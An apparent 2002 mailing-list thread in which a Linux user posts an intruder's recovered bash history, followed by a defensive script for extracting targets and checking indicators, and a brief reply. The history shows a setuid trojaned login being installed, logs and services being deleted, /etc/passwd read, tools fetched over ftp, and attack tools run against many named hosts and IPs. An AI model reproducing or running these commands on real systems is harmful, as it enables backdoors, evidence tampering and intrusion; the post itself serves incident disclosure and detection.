 I got hacked and the hacker left this trace.

Dear all,

Of all things, my Linux box using a modem got hacked/trojaned.
The intruder left this in the .bash_history; please check if you
got it too. There are many sites that were attempted with something
as shown.

Please forward/check with the admin guys if you are familiar with
the domain and/or IP addresses.
----------------
TERM=vt100
pico
gcc -o login bj.c
chown root:bin login
chmod 4555 login
chmod u-w login
cp /bin/login /usr/bin/xstat
cp /bin/login /usr/bin/old
rm /bin/login
chmod 555 /usr/bin/xstat
chgrp bin /usr/bin/xstat
mv login /bin/login
rm bj.c
rm /usr/sbin/rpc.mountd
ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history
rm /home/kargay
rm /home/kargay/.bash_history
cd /home/kargay
ls
rm -rf *
ls
cat /etc/passwd
cat /etc/hosts
cd .s/dsc
ls
cd .s
ls
./k 202.30.12.244
./k 202.30.48.72
./k 202.30.48.244
./k 202.30.93.154
./k 202.30.93.150
./k 203.230.221.37
cd .s
./d bncchile.cl
TERM=vt100
telnet bncchile.cll
telnet bncchile.cl
exit
mkdir .s
cd .s
ftp mail.bankduta.co.id
unzip linux.zip
chmod +x amdex
mv amdex k
chmod +x mountd
mv mountd d
./d athena.directnet.com.au
./d 202.61.237.123
./d 202.61.252.249
./d alcala.Math.Uni-Augsburg.DE
./d kant.Physik.Uni-Augsburg.DE
./d sozgeo3.Geo.Uni-Augsburg.DE
./d ranabib.rana.fylkesbibl.no
./d 128.39.153.88
./d nisse.gtf.ol.no
./k 212.47.198.113
./d ns1.software602.cz
./d koleje.inplus.cz
./d 212.47.13.197
./d 212.47.13.194
./d 212.47.13.202
./d 212.47.13.209
./d mail.sasbrno.cz
./k 63.198.12.20
cd .s
./k 131.125.74.2
./k 139.62.37.23
./d math-31623.coas.unf.edu
./d 202.61.252.249
./d blue7.mps.ohio-state.edu
./d sycamore.mps.ohio-state.edu
./d amy.mps.ohio-state.edu
./k 171.64.18.167
./d anya.Stanford.EDU
./d netops-9.Stanford.EDU
./d sul-hw-drobinson.Stanford.EDU
./k 209.8.2.235
./d 209.8.0.66
telnet localhost 274444
telnet localhost 27444
./k 134.7.1.50
./k 134.7.1.50
./k 134.7.1.85
./k 134.7.1.168
./k 134.7.2.200
./k 134.7.5.255
./k 134.7.5.254
./d 194.163.27.195
./k 195.224.16.14
cd .s
./k 165.230.67.132
./d rutadmin-smtp.rutgers.edu
./d rcrs-aquatics-scuba.rutgers.edu
./d aquatics.rutgers.edu
ls
ls
ls
cd .s
./d igpp2153.ucr.edu
./k 138.23.168.24
./k 138.23.168.40
./k 194.163.34.119
./k 194.163.86.132
./d woodpecker.poptel.org.uk
./d shirehorse.equiworld.com
./d ns0.jupiter.net.uk
./d news.jupiter.net.uk
./d metis.jupiter.net.uk
./d www.whitgift.croydon.sch.uk
./d oaktree.jupiter.net.uk
./d www.delta-anglia.co.uk
./d sflovers.rutgers.edu
./d scilsnet2-211.rutgers.edu
./d 202.155.4.252
./d 202.155.9.250
exit
cd .s
./k 128.211.161.83
./k 128.211.161.119
./k 128.211.226.122
./k 128.211.236.49
./k 131.170.195.19
dig @linux.quicksilver.org version.bind chaos txt
./d ocelot.lib.rmit.EDU.AU
./d euler.ls.rmit.edu.au
./d liberator.art.rmit.edu.au
./d pc37.et.rmit.edu.au
./d blackadder.cse.rmit.edu.au



 Fri, 02 Aug 2002 03:00:00 GMT   
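The post asks readers to check whether they got the same intrusion and to pass the target list on to the admins of the affected domains. The script below is an added example, not code from the original post: a POSIX shell script with two functions (the function names are this example's own). The first lists every host the intruder's ./k and ./d tools and the ftp command were pointed at in a recovered history file. The second looks under a given root for the footprints the history shows being planted: the stray copies of the real login at /usr/bin/xstat and /usr/bin/old, a setuid bit on /bin/login (the replacement was installed mode 4555, while a stock login is normally not setuid), and a hidden .s tool directory directly under /root or a home directory. Only the setuid bit is tested, not the root:bin ownership; compare owner, group and a checksum of /bin/login against your package manager's record as well (for example rpm -V or debsums), and check whether rpc.mountd and portmap are missing when their packages say they should be there.

```shell
#!/bin/sh
# Added example, not from the original post.  Two helpers for an admin who
# suspects the same intruder: pull the targets out of a recovered history
# file, and look for the footprints that history shows being planted.
# Function names are this example's own; the indicator paths (/usr/bin/xstat,
# /usr/bin/old, a hidden .s directory, a setuid /bin/login) come from the
# history quoted in the post above.

# extract_targets HISTFILE
#   Print "tool target" for every host the intruder's ./k and ./d tools were
#   pointed at, plus any ftp site the tools were fetched from, de-duplicated.
extract_targets() {
    awk '($1 == "./k" || $1 == "./d" || $1 == "ftp") && $2 != "" { print $1, $2 }' "$1" |
        sort -u
}

# check_iocs [ROOT]
#   Look under ROOT (default /; a trailing slash is dropped) for the
#   rootkit's footprints.  Prints one line per indicator found and returns 1
#   if any were found, 0 if the tree looks clean.
check_iocs() {
    root=${1%/}
    found=0

    # stray copies of the real login binary left behind by the swap
    for f in usr/bin/xstat usr/bin/old; do
        if [ -e "$root/$f" ]; then
            echo "IOC: stray login copy $root/$f"
            found=1
        fi
    done

    # the replacement login was installed mode 4555; stock login is not setuid
    if [ -f "$root/bin/login" ] && find "$root/bin/login" -perm -4000 | grep -q .; then
        echo "IOC: setuid bit on $root/bin/login"
        found=1
    fi

    # hidden .s tool directory directly under /root or under a home directory
    for d in "$root/root" "$root/home"; do
        [ -d "$d" ] || continue
        hits=$(find "$d" -maxdepth 2 -type d -name .s 2>/dev/null || true)
        if [ -n "$hits" ]; then
            # $hits is unquoted on purpose: one IOC line per path found
            printf 'IOC: hidden tool directory %s\n' $hits
            found=1
        fi
    done

    return $found
}

# usage (source the file, then):
#   extract_targets /root/.bash_history
#   check_iocs /mnt/suspect || echo "indicators found, treat the box as compromised"
```

Run check_iocs against a mounted image of the suspect disk rather than the live system where possible, since a trojaned login or a modified ps (the history greps for inetd and portmap with the very tools a rootkit typically replaces) can lie about what is on the box.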
 I got hacked and the hacker left this trace.
Sorry, I don't know any of those IP addresses (they're not mine =). But I'm
glad you are keeping a close watch on your system. You must have a
minimum # of users, because my general theory, which seems to match
administrators' attitudes, is: as the user # goes up, attention to detail goes
down.

Good job, sorry I couldn't help,
Jeff



 Fri, 02 Aug 2002 03:00:00 GMT   